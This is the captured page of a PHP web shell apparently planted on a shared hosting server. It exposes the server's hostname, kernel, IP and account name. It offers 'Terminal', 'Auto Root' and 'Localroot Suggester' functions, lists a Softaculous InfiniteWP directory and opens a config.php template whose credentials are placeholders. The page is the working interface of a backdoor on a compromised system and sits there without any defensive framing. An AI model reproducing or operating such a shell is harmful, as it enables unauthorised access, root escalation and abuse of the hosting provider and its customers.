Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.209
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
iwp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
php53
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
php56
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
php71
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
php81
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
php82
[ DIR ]
drwxr-xr-x
2025-06-27 14:15
clone.php
4.76
KB
-rw-r--r--
2025-06-26 11:36
config.php
1.11
KB
-rw-r--r--
2025-06-26 11:07
edit.php
4.35
KB
-rw-r--r--
2025-06-26 11:36
edit.xml
447
B
-rw-r--r--
2025-06-25 07:18
fileindex.php
281
B
-rw-r--r--
2025-06-25 07:16
import.php
3.21
KB
-rw-r--r--
2025-06-26 11:36
info.xml
2.18
KB
-rw-r--r--
2025-06-26 11:07
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
4.71
KB
-rw-r--r--
2025-06-26 11:36
install.xml
1.09
KB
-rw-r--r--
2021-12-23 11:54
iwp.sql
20.19
KB
-rw-r--r--
2025-06-26 11:07
iwp.zip
6.13
MB
-rw-r--r--
2025-06-26 11:07
md5
2.53
KB
-rw-r--r--
2025-06-26 11:36
notes.txt
818
B
-rw-r--r--
2025-06-26 11:07
Save
Rename
<?php #Show Error define('APP_SHOW_ERROR', true); @ini_set('display_errors', (APP_SHOW_ERROR) ? 'On' : 'Off'); error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT); if(defined('E_DEPRECATED')) { error_reporting(error_reporting() & ~E_DEPRECATED); } if(function_exists('phpversion')){ if(version_compare(phpversion(),'8.0.0','>=')){ error_reporting(error_reporting() & ~E_WARNING); define('IWP_PHP8',true); } } define('SHOW_SQL_ERROR', APP_SHOW_ERROR); define('APP_VERSION', '3.4.5.1'); define('APP_INSTALL_HASH', '[[APP_INSTALL_HASH]]'); define('APP_ROOT', dirname(__FILE__)); define('APP_DOMAIN_PATH', '[[softurl_no_http]]/'); define('APP_V3', 1); define('APP_ROOT_V2', dirname(__FILE__)); define('APP_DOMAIN_PATH_V2', '[[softurl_no_http]]/'); define('EXECUTE_FILE', 'execute.php'); define('DEFAULT_MAX_CLIENT_REQUEST_TIMEOUT', 180);//Request to client wp $config = array(); $config['SQL_DATABASE'] = '[[softdb]]'; $config['SQL_HOST'] = '[[softdbhost]]'; $config['SQL_USERNAME'] = '[[softdbuser]]'; $config['SQL_PASSWORD'] = '[[softdbpass]]'; $config['SQL_PORT'] = '3306'; $config['SQL_TABLE_NAME_PREFIX'] = '[[dbprefix]]';